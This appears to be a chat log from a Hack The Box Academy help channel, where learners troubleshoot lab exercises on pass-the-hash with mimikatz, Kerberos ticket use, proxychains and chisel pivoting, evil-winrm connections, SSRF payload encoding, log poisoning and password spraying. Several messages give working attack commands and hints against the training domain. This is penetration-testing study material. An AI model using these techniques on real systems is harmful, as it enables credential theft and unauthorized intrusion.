the dc01 is a machine in the internal network

172.16.1.10

you have to pivot in the ms01 and then you can do an attack using impacket from your linux

but as you can see you do not get (Pwn3d!)

you cant execute commands

also the mimikatz one is intended to give you a shell as ms01/administrator but with privileges on dc01 shares

w8 you wrote "Invoke-SMBexec" and i read "impacket-smbexec" which also exists HAHAHAHA

but if you get access denied is for the same reason as you are not getting Pwn3d! on cme

the one that get access is Julio (he has write privileges on shared resources)

2 last questions

see the difference ? @oblique spoke

Are you running cmd as an administrator before you navigate to C:\tools mimikatz.exe? Are you running mimikatz with privilege::debug mode

mimikatz cant give you a shell on a remote machine

david does not have write permissions on Admin$

Does anyone else have/had the problem with host seems down when using nmap? Because every single time I get that error and my vpn is setup correctly

-Pn

-Pn will say the host is online but blocking all ports

probably a windows machine in the other side (icmp disabled by default)

totally unrelated to your initial question

if you know its up and you have connection with it, use -Pn

I thought he was talking about this question - Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt

he was indeed

but david cant execute commands on DC01 remotely

he can just read shares

(pwn3d tag on crackmapexec)

Yeah you can pass his hash with mimikats and run cmd.exe as an admin and you get sys32 privs to read his txt file

??

did you notice his txt is on 172.16.1.10?

the cmd.exe you ran with mimikatz is NOT on 172.16.1.10

Yes

C:\tools> mimikatz.exe privilege::debug "sekurlsa::pth /user:david /rc4:xxxxxxxxxxxxxxx /domain:inlanefreight.htb /run:cmd.exe" exit

yes

that run a new cmd but in the context of MS01 administrator

the one you RDP with

Then C:\Windows\system32>type \DC01\d*****

yes

you cant still execute commands on DC01

if you do 'whoami' from that new cmd.exe

you will get ms01/administrator

How did I get the flag then?

because its a new process with access to the network share

on 172.16.1.10 (DC01)

Yeah exactly 👍

if david was admin on dc01 (julio is)

you could execute commands on dc01 with invoke-thehash or psexec.py

among other tools

The question asks to read the file on DC01 with the flag in it not execute commands on the DC though

that is what i told him

because he tried 'Invoke-SMBexec' with david

and he asked why does it work with julio but doesnt with david

tried to explain it

Yeah not going to work, but you replied to me saying mimikatz is not going to give you a shell. Which I know that, but if you run mimikatz in a context which Requires administrator access (with debug rights) or Local SYSTEM rights and pass his hash then open cmd which will be running as an administrator you can read his file

"mimikatz cant give you a shell on a remote machine" this is what i said

actually is different from "mimikatz cant give you a shell"

Thnks!

You were on the right track - With the administrative CMD you get from mimikatz see if you can read files from \\DC01\David

trying docker privilege escalation but why the container is not created

Yes, but it can give you a shell were you can read files from a remote machine 😉

lol ok

hi

what is the output of the command docker image ls?

found the flag, thanks.

Hi I'm doing the module "Password Attacks" - "Credential Hunting in Windows". I've used the tool lazagne.exe to extract credentials and got the WinSCP username and password. But the credential got by lazagne.exe is not accepted. Could anyone share some hints on this question?

Oh I got it

Just try different combinations👀

on sql map essenatail Attack Tuning i have the flag but its not working

can somone who did this helps me

what is the url on the javascript deobfuscation htb course? it just stays "http://SERVER_IP:PORT" and that's not a valid url

the one of the exercise

above the question

target one

you are missing some character

run it again

also check the hint

Having troubles with proxychains and evil-winrm --> cant find server! ```roxychains evil-winrm -i 172.16.1.10 -r INLANEFREIGHT.HTB
ProxyChains-3.1 (http://proxychains.sf.net)

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.1.10:88-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.1.10:88-<><>-OK

Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
Server not found in Kerberos database

Error: Exiting with code 1

any solutions?

oh wow that thing was not loading for some reason, thanks bro had to refresh my chrome for a bit

According to gpt there should be an spn entry for win-rm, but there isnt - could this cause the error? ```C:\Windows\system32>setspn -L dc01
Registered ServicePrincipalNames for CN=DC01,OU=Domain Controllers,DC=inlanefreight,DC=htb:
TERMSRV/DC01
TERMSRV/DC01.inlanefreight.htb
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC01.inlanefreight.htb
ldap/DC01.inlanefreight.htb/ForestDnsZones.inlanefreight.htb
ldap/DC01.inlanefreight.htb/DomainDnsZones.inlanefreight.htb
DNS/DC01.inlanefreight.htb
GC/DC01.inlanefreight.htb/inlanefreight.htb
RestrictedKrbHost/DC01.inlanefreight.htb
RestrictedKrbHost/DC01
RPC/adad1f50-8aaf-4555-a268-71d8c86b6a26._msdcs.inlanefreight.htb
HOST/DC01/INLANEFREIGHT
HOST/DC01.inlanefreight.htb/INLANEFREIGHT
HOST/DC01
HOST/DC01.inlanefreight.htb
HOST/DC01.inlanefreight.htb/inlanefreight.htb
E3514235-4B06-11D1-AB04-00C04FC2DCD2/adad1f50-8aaf-4555-a268-71d8c86b6a26/inlanefreight.htb
ldap/DC01/INLANEFREIGHT
ldap/adad1f50-8aaf-4555-a268-71d8c86b6a26._msdcs.inlanefreight.htb
ldap/DC01.inlanefreight.htb/INLANEFREIGHT
ldap/DC01
ldap/DC01.inlanefreight.htb
ldap/DC01.inlanefreight.htb/inlanefreight.htb

When referring to WinRM, the typical SPNs that might be registered are WSMAN/hostname or HTTP/hostname. This depends on how WinRM is set up:

WSMAN/hostname: This is the general SPN that would be registered for the WinRM service if it's set up to use Kerberos for authentication.

im confused

Can anyone help me? would really appreciate it

A char was replaced by something else

happens on time bases

based

Or is this the wrong channel for my quesitons? Maybe i have to contact the support?

Tell us how you setup proxy chains? Etc

Do other services work over proxychains?

Need to eliminate where in the process something has stopped working

config file: ```# proxychains.conf VER 3.1

HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.

The option below identifies how the ProxyList is treated.

only one option should be uncommented at time,

otherwise the last appearing option will be accepted

#dynamic_chain

Dynamic - Each connection will be done via chained proxies

all proxies chained in the order as they appear in the list

at least one proxy must be online to play in chain

(dead proxies are skipped)

otherwise EINTR is returned to the app

strict_chain

Strict - Each connection will be done via chained proxies

all proxies chained in the order as they appear in the list

all proxies must be online to play in chain

otherwise EINTR is returned to the app

#random_chain

Random - Each connection will be done via random proxy

(or proxy chain, see chain_len) from the list.

this option is good to test your IDS :)

Make sense only if random_chain

#chain_len = 2

Quiet mode (no output from library)

#quiet_mode

Proxy DNS requests - no leak for DNS data

#proxy_dns

Some timeouts in milliseconds

tcp_read_time_out 15000
tcp_connect_time_out 8000

ProxyList format

type host port [user pass]

(values separated by 'tab' or 'blank')

Examples:

socks5 192.168.67.78 1080 lamer secret

http 192.168.89.3 8080 justu hidden

socks4 192.168.1.49 1080

http 192.168.39.93 8080

proxy types: http, socks4, socks5

( auth types supported: "basic"-http "user/pass"-socks )

[ProxyList]

add proxy here ...

meanwile

defaults set to "tor"

#socks4 127.0.0.1 9050
socks5 127.0.0.1 1080

Guess this should be ok?

Okay and what are you using to create your tunnel from your pivot host?

chisel also running

Okay and is that showing as connected?

yes

do any other services work over tour tunnel?

2023/10/24 16:37:56 client: Connecting to ws://10.10.16.26:9999
2023/10/24 16:37:58 client: Connected (Latency 105.384018ms)
``` on linux01

nmap is working

but when running proxychains with evil-winrm: it says: Server not found in Kerberos database

ippsec has a video explaining that

I dont have my notes in front of me so can't check this section. But I would recheck all commands

Wait does winrm not work over proxychains?

Links or it didn't happen

i dont know the exact machine

i have a vague memory of the error description

still the Module:Password Attacks Section:Pass the ticket from linux optional exercise

@sly dome you mean this video: ```PivotAPI Setting proxychains up to utilize MSSQL Proxy and using Evil-WinRM to get a shell on the box, then downloading and cracking a Keypass Database````

nop

any javascript deobfuscation module recommendations to learn it? i just finished the tier I one

@sly dome you know which video?

im looking

it was something related with the order of the domains in the etc hosts

https://youtu.be/rfAmMQV_wss?si=QAMWI1bZ4dIV0QPb

34:45

same error

So I spent last night trying to get into dc01 Linux01$ from root user on the last question in password attacks pass the ticket. This question keeps screwing me up. Does anyone please have any pointers to what I should do

I’m in root@linux01

Need to get to dc01/linux01$

you have 2 ways of doing that

using machine keytab or ccache file

if you run klist you will see a keytab with linux01$ credentials

then just kinit 'LINUX01$@INLANEFREIGHT.HTB' <keytab path here>

notice the single quotes to get rid of the $ symbol disagreement with bash

the other way is using the ccache file as usual

So your saying remove the $ symbol

No...

Or put linux01$@ in quotes

If it's not in single quotes, the command will break because of $

yes

also double quotes wont work

they are intended to expand variables

Ok got it thank you so much I’ll try it when I get home

(bash variables are declared with $)

exclusively single quotes

hi guys

who help me

for hash

Currently on Enumerating & Retrieving Password Policies tryign to get the flags . Are you suppose to be able to get them remotely, have tried both CME and rpcclient. Get nothing back. Any hints?

yeah

Good Day can anyone able to give me a nudge on Linux Privilege Escalation - Logrotate? im not getting the shell to connect i was able to change the date/time in logrotate.status

What's the module? what's the question? What have you done so far?

@robust coral there's a #prolabs-zephyr channel, you'll need to follow instructions in #welcome I did not give permission to dm me at all.

@sly dome thx for the video link! Nevertheless the error keeps the same: Server not found in Kerberos database 😦

Are you still trying the optional exercise?

yes

for days now

Just move on

Save your headache for after you complete the path

Or the module

im gonna try it xd

thx man

just tried it with the pwnbox but same error

i think its not well configured on their end

contact support or #858470491676737536

Like. The fact you're spending days on something optional instead of moving on shows that you'll probably fall into rabbit holes on the exam

xDD?

but they cant explain an example which doesnt work - also guessing it has to do with the setup

gimme 20 minutes

[ SERVER-SIDE ATTACKS] - [Blind SSRF Exploitation Example ] - [ The target is vulnerable to blind SSRF...]
{Question} -> Why the reverse shell payload must be encoded twice ? instead one time only?

Thank you!

one for each url decode it suffers

Oh I see... in case we had a 3 chains before reaching the vulnerable target I would need to encode it 3x then ?
Thanks @sly dome

it depends, if the 3 web servers are doing url decode yes

its something specific to each scenario

not a rule

@sly dome have you tried it or still trying?

i am with the krb5 config

@sly dome thx for the update

Hi, Im stuck in the Attacking Thick Client Applications section, Attacking Common Applications module. In the debugger I cannot see the MZ bytes

what was your error

And I have been trying a lot, but no Map record with rw privileges is showing up

@sly dome Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information Server not found in Kerberos database

@sly dome in proxychains.conf --> dont forget to comment out #dns proxy -- just in case

i dont use proxychains

but i get another error

Cannot find KDC for realm "INLANEFREIGHT.HTB"

@sly dome oh my

wmi-exec works tho

thx for you effort - guess skipping that one with evil-winrm is a good option - have wasted enought time now - thx

getting it now

what did you change?

nothing actually lol

Yo, wsg y'all. I am on the module calledInfo gathering - Web edition. On the Virtual Hosts part. I found the second flag via ffuf and vhost wordlist. Anyone got an idea on how to find the rest of the vhosts?

On MS01:C:\Windows\system32>setspn -L dc01 - shouldnt there be an spn for wsman/.... or something to get winrm work?

according to gpt

No matter how I follow the instructions (I have tried in all ways), I never got the record MAP with rw permissions

So, in the password attacks module, there is a chapter on Passwd, shadow, opasswd. The last question asks us to get the password for root using Will's credentials. I assume those come from the passwd.bak and shadow.bak files in the .backup folder Will has or was this all a trick and I spent an hour on hashcat to get nothing from the hashes in shadow?

yes u crack that

With rockyou? because that didn't give me anything

probably with the mutated list

Ah, yeah

Makes sense

xD

I was too scared to cancel the rockyou one so I let it run while working lmao

its something local with the DNS

nvm, found it

@sly dome my i shall contact the support? as you mentioned earlier

i dont think so

so just let it be...

later im gonna check in wireshark

cant see a single KRB5 packet

this is very weird l0l

yeah me too - almost only tcp

we might contact any pro

xD

@sly dome yeah maybe - where are the pros - xD

Julio Ureña is the module author

he probably can help

is this still about optional exercise ?

yeah

1st question or 2nd one?

1st

use the pwn box, everything will work

i tried with pwnbox - same error

you free now?

yeah

spin the box and check your dm

dm? dont understand?

I sent a Direct message

does it work from pwnbox

it did, i tried it for him like couple of days ago

what is the difference

just some dns issues that i dont know how to fix on my VM thats it

exactly

but what DNS config has the pwnbox apart from the hosts file

imagine were in an exam lab and this happens

should be cool knowing how to fix this

Yeah, I mean I had the same doubt, I even pointed my dns to dc but it didnt work

/etc/resolv.conf

Yes but that didnt work

ufw enabled?!

no

I always use my own VM for this stuff, I would highly recommend it. Stay away from the pwnbox lol

@sudden blaze

this is what i got debugging it

its always dns with kerberos

i know

problem is how to fix o.O

idr if just adding those entries fixes it or if you have to use the dnschef method

adding them does not fix

https://youtu.be/4ydjpSSKQ8g?si=f1wIrRBTuTTbvP1S

meant for bloodhound but the core issue should be the same

i mean if this is an error in the modules, it should be explained ... my opinion

iirc not an error in the modules, its extra credit for a reason

^

It's going beyond what's explained or expected

in the section it is explained and its not working

wdym?

It's not fully explained It's just saying it's possible

indeed it is explained lol

no

its fully explained

from etc hosts to winrm connection

Either way It's extra credit aka extra headache

can happen in exam lab

or real life engagement

Were you able to figure this out? working on it myself now

Hello

Web Attacks Module. Anyone free for a DM

sure

Hey I'm stuck at "Skills Assessment - File Inclusion" for to long,
I've tried all what the module has offered in the File Disclosure on ||/index.php?page=|| with ||/etc/php|| but I can't get anything ...
thanx in advance

in this one, try harder..

cant tell you more

hello guys to find the attack vector on sql map essentail i tried almost everythiing

almost

thx

the page is taking no param just rfreshing or get request XD

so this is the page and way I understand

tell me if u need help, but try a little more

hint: base64

i was trying with burp fisrt i thaught its going to be in the search bar or those feild l but nothing now im inspecting the network and pooking around

wat

soryy was typing too fast

broo can i dm you

yes

@undone narwhal it does not work on pwnbox either xd

Afternoon, folks,

I seem to be stuck in the NMAP service enumeration module and seeing if I can get some help point me in the right direction? I ended up with two flags and tried to submit both and neither have worked. I followed through the process of running the banner grab, started tcpdump and then netcat to get the flag with a 200 code. Is this a normal output respopnse? I also plugged the IP in the web browser as well and ended up with a seperate flag.

section?

NETWORK ENUMERATION WITH NMAP: Service enumeration

hint: 🤖🤖

To the module? Its in the PenTest path in the Academy

i gave you a nudge

to solve it

hint = nudge

hmmm as in robots.txt

https://nmap.org/nsedoc/scripts/http-robots.txt.html

Awesome @sly dome I'll check it out. Thank you!

anyone who can share a hint, 'cause know I'm missing something; How can I use mssqlclient.py to grab the last flag?, this is regarding Privileged Access section from Active Directory Enumeration & Attacks

The module said we can use mssqlclient.py from our local machine, but the MSSQL server is into 172.16.5.0/24 network

found the flag but the 'cat' command doesn't work ...

ok I C it now, what I don't get is Y the whole log format changed...

Hi everyone. I am complately stuck at ATTACKING ENTERPRISE NETWORKS - Lateral Movement. i tried everything and i am at the stage of killing myself. i can't manage priv esc. plz help
https://academy.hackthebox.com/module/163/section/1549

thanx BTW
I kept missing it until I put it file ...

ls

idk why I can't get rev shell

https://academy.hackthebox.com/module/113/section/1213

hey guys currently at attacking common services easy lab. Found a user with smtp-enum but im stuck tried to brute froce my way into each service but no luck need a nugget pls

buddy youre at the easy lab too?

no still on Attack splunk

ahh i see

Hi I am on AD Assessment 2, Q8 getting Admin on MS01. I have gotten hint to use admin NTLM hash from SQL01 to reuse. I believe it is wrong. The hash for the local admin on SQL01 is 136b3ddf<SNIP>248f364 as I can evil-winrm to SQL01 directly with this with a new lab. And It doesn't work on MS01. Can someone give me some other hint how to get to MS01 Admin? I have tried PrintNightmare and the account AB920 dooesn't have engouh privilege

pls read the Scenario Setup part on that section

how can you expect anyone to help with that little info and context? what did you try and what failed also are you doing that module blind or following the sections (which is a completely walkthrough)

when brute forcing make sure you include the target domain in the username (username)@inlanefreight.htb

yes i already did it

found the password with another wordlist and had to slow down the brute force

Why aren't you trying to brute smtp?

i did buddy but i used the given wordlist

Lol timing

🙂

now lets see where this creds will lead me

The next step

but never had to use other lists than the given one thats why i was brute forcing all with no luck

next step is for me to look for mysql

Internally

the hint that you got is right but could be a bit misleading because the hash isn't for logging in, it's for an "attack" (not really an attack, more like post exploitation)

Attacking enterprise networks module section:Web Enumeration & Exploitation on the last question its bypassing blacklisted characters and that sorta thing. and ive managed to see the flag but i cant read it i assume due to characters like _ . I've tried encoding and everything and just cant get it. any hints?

that's the right path (hence pls remove due to spoiler) but you should get a set of cred not hashs, maybe try cme

are you following the section or doing it blind?

@vital adder have been trying a quick skim over it but not fully reading kinda thing. altho i have been reading this last 1 . and i think i skimmed over an import bit lol 1min

ok yeah im still stuck lol. i just seen the blacklisted ping.php

but have already been trying to bypass them which i have up to this point to see the flag file i need. i just cant cat the file

there is an example that they show you how to encode the cat command and read the ping.php file you can just change the file to your flag

ok ill look again thanks

omg im an idiot. thanks @vital adder

haha what an over sight that was

I tried it last night as well it worked for me, did you take a look at krb5 config file after installation cuz it didn't set the realms at all, you have to do it manually

Goodnight can someone give me a nudge in Linux Priv -Logrotate im not sure what im missing the shell is not executing

Read this

https://0xdf.gitlab.io/2020/07/11/htb-book.html#priv-reader--root

ok thx got it

i'm stuck in "Skills Assessment - File Inclusion", please give me some help !
https://academy.hackthebox.com/module/23/section/513

i find admin panel,but I don't know what to do next, I can't read /etc/passwd

I couldn't find the ldapadmin password in Skill assessment 1 in the module Windows Privilege Escalation. Perhaps I have tried almost every string or file that I can think of; it appears there is a some flaw in my methodology.
I would be grateful If somebody could please push me in right direction!

Hi I am in the Payloads and shells module's engagement section for host 2 there is a metasploit vuln I think it should work but should I use it or exploit it manually?

You can poison the logs on the admin pannel

hey ppl, greets!
I ;m on the getting started knowledge check module.
This is my third run over the module assessment but smth weird happens:

After having done web enum, I go for the cms RCM exploit via msf,
I set my options, check the exploit and so far so good... then I run it and it s different from the other times. So, what i mean by that:

1 -> on my first tries, going in I had a poor shell, then upgraded tpy
-------> This time though I m already landing in an elevated shell when running the exploit.

2-> I can't run basic commands I used to be able to when doing the first runs. I ;m reffering to commands such as:
a. whoami (not found)
b. echo (not found)
c. sudo (not found)

Can anyone please reproduce this is it the same? Am I doing smth wrong maybe?

When running stuff via metasploit you get to choose what payload you want to use. Sounds like the first time you did a simple shell that you had to upgrade and the second time you used meterpreter, which is metasploits own “shell” with different commands

You can type “shell” in meterpreter to drop into a normal shell

f* me... gee totally forgot.. thnx! @tranquil axle

on kerbrute when you use flag "-o valid_usernames.txt"

aren't you suppose to be able to cat the list?

this is service log, I guess the "request" field is the path of my request, and I want to poison it, but I have visited different paths several times and found that there is no change in this log, why?

@glossy wedge can you help me ?

have another look at the log poisining part of the module. It should be similar

Now my problem is that I made the request and nothing has changed in the service log

Nice to hear its just not me 🙂
btw how much did you have to clean up the valid user name list. Get error when I try passwordspray , tried with and without domain

Hi, I am stucking at the this question "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?" , I actually found the page which says 'You don't have access!' but when i submit the url, it says the url is not correct

any idea ?

@glossy wedge

I think I have read somewhere that HTB provides one to one session for some subscription.. Is this correct? I do have the subscription.

finally done with AD module ❤️ interesting finding the AD module skill assessment part 2, US and EU labs have different SAM hashes. Seems like the labs are not exactly the same. not super important as there are other ways leading to the target.

nice @iron hazel

You got any recommendation on my post above. need some help

kerbrute?

ye

have exported the user list, but when running the passspray I get above error

Which module and which section is this from?

AD Enumeration & Attacks / Internal Password Spraying - from Linux

You are supposed to be able to cat the list as it is the list you provide to kerbrute to brute force

as for the error i am not sure

thats strange. cause when suing the flag: -o the file shows nothing. so had make manual copy to a txt file (and clean it up)

ur command looks right

where did u get this valid_user list from

i thought we have to gen this list

the terminal

oh i misunderstood it...u were using kerbrute to enum users

and then spray password ok

omg

well if you are using kerbrute to output the valid user list and it is empty then something is wrong at that step

I think i know what I did wrong

there are different ways to get a valid user list..sorry i didnt understand the -o question

yeah i got it now as i re-read his question. I thought he got a validlist already to feed to kerbrute to spray.

while we are on topic..do u guys know if the enumdomusers from rpcclient is definitive? if we can get that we don't need a dictionary to enum users right?

hmm

I dont get this to work. i re-enumerate the user list > manual creating the user_list since the ecport not working > running passwordspray and get the same error

seems like something is up, in previous userenumeration I got a hit of 56 valid users, now when I do it I the number is 36

hmm

have done that twice

yes it was all configured

if you can share how you did it ✔️

btw, how much clean up did you have to do of the user list?

s... @inlanefreight.local or just the username?

I just followed the same steps showed in the section

dude, it worked when you limited it to usernames on s

bro HAHAHAA

the fkn hell it works from my VM

Isn't this strange, isn't it realistic to think that the passwordpsray would work on all valid usernames?

no dns issues?

ypu have to use -i FQDN or -i HOSTNAME

i was using -i IP

fkn noobs we are lol

in real world scenario how would you know to limit yourself to usernames that start with a specific letter...

lol

no one noticed and i was too focused on DNS

rabbit hole 🤣

oh i noticed but didnt think it would go for ntlm auth cuz there is a domain name already right

evil-winrm

thanks for the help

@sudden blaze

at least we practiced the concepts a lot

troubleshooting is unreal to learn

l0l

What's the fix?

it was going for kerberos auth but if u tell him -i IP it tries a reverse DNS lookup and its not configured

-i HOSTNAME or -i FQDN

Ahhh

That's going in the notes

yes it is sir

but i was using xenotim's command

and he used -i IP

didnt even notice it

i used this evil-winrm command as a guide

and from there my brain was just tryna fix DNS issue

I am in the engagement section of the payloads module I just want to clear something can it be done without seeing the hints if so can you nudge me in the right direction for the second host as the hint there gives the cred from recon I tried using nmap and gobuster and checked the sourced code and did not find anything

you’re talking about the blog?

Yes it's doable without hints

The creds are on the desktop of the attack host

When I asked, they did say they tried with both, so idk what happened there, did it get resolved?

yes

you didnt ask me xD

and ofc i do not read all the messages

its totally doable from own VM

I would have if I were around

as it should be

OK dad

how dad

Dad's never around

^

if this is the blog one, the question is just giving you the answer: What language is the shell written in that gets uploaded when using the 50064.rb exploit?

💀

SocksOverRDP should i let it be? or try again

If anyone has some time i would like to kindly request some assistance for Linux Priv Escalations -Sudo Getting a weird error

Not just the questions i want some advice on exploiting the blog. So far I could only gather that the box has 2 open ports 22 and 80 the blog has an post for the 50064 exploit no special hidden directories from a common scan using gobuster just the basic stuff. Any advice on what else to look for here?

use the exploit

there are not directories

or anything

whats the point of this section? xd

it's a puzzle ?

its working now but totally non-sense the SocksOverRDP section HAHA

I thought there was a little hidden something there in the box so I did not use the exploit and the hint just gave the answer so i felt like cheating thanks for the tip I will do the msfexploit

@sly dome so you get the optional exercise working - with -i FQDN right? Was just gonna try that, then saw your solution 🙂

its explained in the section

to use -i DC01

yeah

didn't you say you tried with -i dc01

.

yes

This channel isn't for #fortresses , read #welcome to figure out how to access that channel

guess i tried with -i dc01 but had wrong ip assigned to it as far as i can remember

ah, yeah, that wouldn't work

finished the Pivoting module but my question is

in the skill assessment, what is the purpose of the linux host in the 172.16.6.45? xD

anyone noticed it?

it's not in my notes and I don't remember it so no

what does a scan show?

only port 22 open (SSH)

yea

looking at my notes too

maybe uses by the authors

used

to test?

I went for ".25" 😅

6.35?

could be

thats the pivot one

25, pardon

yea me 2

It had more open ports

w.e.

completing it with ligolo-ng was a great feeling

almost felt like cheating lol

i want to try completing it with kerberos ticket

but im completely lost

i think im just gonna step into AD module

it may not be possible

🤷 just felt so easy the DC flag after finding plain text creds

probably intended

to practice more i guess i have to complete AD module and get into prolabs

I didn't enjoy the convenient RDP sessions

in the skill assessment?

yeah

Zephyr has none of that going on

i think they used it to be more user friendly

the modules

and in real life engagement we sre gonna likely find RDP enabled

yeah, but that's dangerous, imagine kicking someone out of their RDP session

Is the academy site having trouble? My connections keep dying.

Are you running the pwnbox at the same time?

If so that can be it

Also I recommend using the tcp download over udp

Ah ok, i will try the tcp file.

@sly dome
Just wanted to try it on my own VM and it worked with ligolo but not with chisel

didnt try with chisel!

Chisel is also just dumb

Yeah but the thing is why did it work on HTB pwn box with chisel

You probably did something slightly different OR version differences

ligolo is just based

Disable proxy_dns in proxychains config file and it will work

i think this is it, i have it enabled on my vm

Hi I got a constant issue with my RDP connection while accessing Windows 10 box in Windows Fundamentals module. Literally 5 minutes and it's disconnecting...when I respawn the machine things get back to normal and the cycle repeats itself. Internet is fine. Any ideas?

I've tried using xfreerdp and remmina

Use tcp vpn download

agreee smooth like butter

How do I copy

Lightweight facebook-styled blog 1.3 - Remote | php/webapps/50064.rb

to metasploit

ok I'll try thanks !

is it still in .msf4?

It's already there, just use it

its in searchsploit

You just can't search it in msfconsole

But if you do locate 50064.rb you'll see it's there

if something is in searchsploit and not in metasploit how do I import it?

You don't need to

It's already imported in msfconsole

ok

I will look again

Literally open msfconsole and type use 50064.rb

its there thanks

@fathom pendant it's good now thanks!

any idea of this error?

What options does the module have and what have you entered?

look at rhosts - shouldn it be an external ip?

I used the one mentioned in the hosts file

try using external ip

The rhosts is right, I'm not convinced the rport is correct

You have to also set vhost for this to work.

Oh yeah forgot that quirk of this one

Hello guys, can you help me with a problem?

Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.

but it does not work

Help!

Let me ChatGPT that for you

Read the question again. You don't have to pass the variable $var to the variable $salt, but the number of characters

Afternoon guys, I'm trying to do the task LLMNR/NBT-NS Poisoning (windows) within the active directory enumeration and attacks module however I'm having issues connecting via RDP. I Initially tried connecting with xfreerdp but kept getting a black screen, so tried rdesktop.
I no longer get a black screen however I get invalid username and password. Was just wondering if anyone else may have auth issues (I've respawned the box multiple times too incase that was an issue)

black screen is a screensaver, just press enter

So it is, thank you kindly

This issue has been asked about 100 times in this channel btw

Screensaver is the new AV

Hi again! Still on Windows Fundamentals trying to use smbclient to list the content of the host 10.129.32.145 which I've created a shared folder on. Problem is I got connection refused which is weird...

Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         _gateway        0.0.0.0         UG    100    0        0 eth0
10.10.10.0      10.10.16.1      255.255.254.0   UG    0      0        0 tun0
10.10.16.0      0.0.0.0         255.255.254.0   U     0      0        0 tun0
10.129.0.0      10.10.16.1      255.255.0.0     UG    0      0        0 tun0
192.168.35.0    0.0.0.0         255.255.255.0   U     100    0        0 eth0

based on the info from the routing table I shouldn't have

smbclient -L 10.129.32.145 -U htb-student                                                                                                                                                        
do_connect: Connection to 10.129.32.145 failed (Error NT_STATUS_IO_TIMEOUT) 

traceroute is failing just ***

Can I ask what am I missing?

OK hands up I didn't search, but it was I got through with rdesktop, I thought I'd missed a step somewhere with them credentials, apologies for that

ok I guess my question is dumb

Dude, did you read the code???

Yes, your code is wrong.

salt=${#var}

salt=${#var}

now maybe you can see

You have to pass the number of characters of the variable $var to the variable $salt, not the content

ok I got it

let me draw
salt=${var} = content
salt=${#var} = number of chars LOOK AT THE #

the devil is in the details

Maybe my code is wrong, but not on this line

What number do you get when you output the variable $salt?

34070

And what number do you get when you count with wc -c?

let me C

would someone be able to help me understand where ive gone wrong as i cant see to get the right answer on my AD question yet its the only thing that makes sense to me?

34071

Thx

And now it works 😉

but Why?

that 1 fuc***ng char lol

can you explain ?

I have no idea what # is doing

What's the question?

authorization

thank you for that

maybe it doesn't take into account the "\n"

counting the chars of the variable...

humm......

Maybe # starts counting with 0. That would explain the 1 character difference

hummm...2

the question needs an erratum

i posted it long ago

still incorrect

the answer should be 34070

👀

In the module wc is explained. If you do it with that, everything is right.

because the string is 34070 characters

nah but its counting the line break xD

Which is also a character

Rafa tu é brasileiro?

no

and keep it english

kkkkkkkkkk

Hi I'm stuck in "Skills Assessment - File Upload Attacks" I think I need to use the weird text so it will identify as an image but I don't understand that text (cause without it I get "Only images are allowed"),
anybody have a hint 4 me please??

read the question

please

The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.

this number is 34070

but who programmed it used 34071 which is incorrect

the hash length is 34070

LF is an Ascii character

https://www.loginradius.com/blog/engineering/eol-end-of-line-or-newline-characters/#:~:text=LF (character%20%3A%20%5Cn%2C,'%20or%20'Newline%20Character'.

NM I got it

and xd

the hash has 34070 characters

not 34071

the \n is inherited from the echo command

ask the author. From my point of view the result is correct

dude you have a string which is "abcdefg" how many characters are there?

with your "ask the author" logic there are 8 characters

Maybe you two should settle this in a battleground, whoever wins is right

which is incorrect

invisible characters are a bitch

^ xD

But also could just be your code being slightly off

wtf? xD

¯_(ツ)_/¯

imagine hash="abcdefg"

what will you answer here

The number of characters in the hash is the value that must be assigned to the "salt" variable.

tell me please

7 or 8?

🙄

If it's injecting a new line character or removing a new line character for w/e reason that could be messing it up

dude wdym? its just askin about the length of a string

the answer is salt=len(hash)

If you decide to do this let me know. I would love to watch

And I'm explaining why it could be off by one character

@thorn urchin honestly didn't realize how goated and simple scp was tbh

hey guys currently at attacking common service medium lab
found an ftp server on a non stand port

yes

got an access but i cant list anything

am i on the right track

Did you list all?

:p

450 LIST: Connection refused

Why not ls

Or ls -la

no luck with ls

will close the connection and do it again

got it

for anyone stuggeling at the same point look at footprinting module and look for a useful command that downloads all the files

hello everyone, can request you help with the last question of the Privileged Access | AD Enum & Attack

I can't understand how to run mssqlclient.py from the jump box?

I set up a pivot through the jump box so I can use my own machine

got the flag medium lab was honstly so easy

the easy lab was more difficult for me :/

the hardest is the easy in that module

lets see what the hard one will make with me

its a Linux staple default installed in like every distro for a reason

Lots of back and forth

gottcha buddy

❤️

Crack password move 1 step forward, grab new thing to crack, move forward

yo im new to this

Hello everyone, I am having difficulty poisoning the web cache in the ABUSING HTTP MISCONFIGURATIONS Identifying Unkeyed Parameters module. I changed the load, did it step by step modulo, placed the load on different pages, waited for a long time, thinking that the bot needed time, but I don’t understand how the admin bot redirects in language=de and as a result I can’t get the flag for a long time . Please help someone with a hint or tell me how to do this correctly

Hi guys, I'm stuck on "Skills Assessment - File Upload Attacks"
I think I understand what I can't use from the "black list" and can from the "white list"
What is allowed in the "Content-Type"
The "MIME-Type"

so now I'm trying to make a XXE but I can't get it to work ...

can I DM for consulting ??

Need help on this module:

Module: Web Attacks. Section: Bypassing Encoded References.

Can I DM u please

[Module: Attacking Commnon Services] [Section: Attacking SQL Databases] [Question: What is the password for the "mssqlsvc" user?] Done the module some time ago, but password isnt valid anymore - is bruteforcing with rockyou.txt the right track?

Yes

Well actually no

Not bruteforcing

There's a way to steal it

ok

so skip bruteforcing

The section talks about it :)

ok

Bruteforcing with rockyou can take forever

therefore i asked 🙂

Yeah you should stick to the methods mentioned in the section

